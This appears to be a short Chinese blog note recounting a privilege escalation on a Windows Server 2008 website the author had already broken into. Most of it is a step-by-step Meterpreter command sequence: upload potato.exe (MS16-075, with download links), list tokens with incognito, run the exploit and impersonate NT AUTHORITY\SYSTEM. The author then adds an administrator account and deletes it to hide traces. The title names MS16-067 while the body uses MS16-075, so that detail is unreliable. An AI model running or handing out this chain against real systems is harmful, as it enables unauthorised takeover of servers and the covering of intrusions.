[MS16-067]提权小记

拿到了一个08 Server 的网站，同时 3389 端口打开着，可以直接连接

尝试了 Meterpreter 反弹 shell ，getsystem 但是失败了

然后团队成员Si告知下尝试了 MS16-075 的利用，记录一下

在 shell 中上传 potato.exe

Github：https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

potato.exe : https://www.lanzous.com/i1lb0ad

在得到的反弹 shell 中，依次运行如下命令

use incognito

list_tokens -u       //列出tokens

execute -cH -f ./potato.exe        //执行exp

list_tokens -u

impersonate_token "NT AUTHORITY\\SYSTEM"    //提权

最后进入 cmd shell 中，添加管理员账号

最终效果：

最后帮忙擦屁股，删账号走人~

关于MSF反弹shell：https://blog.dyboy.cn/websecurity/25.html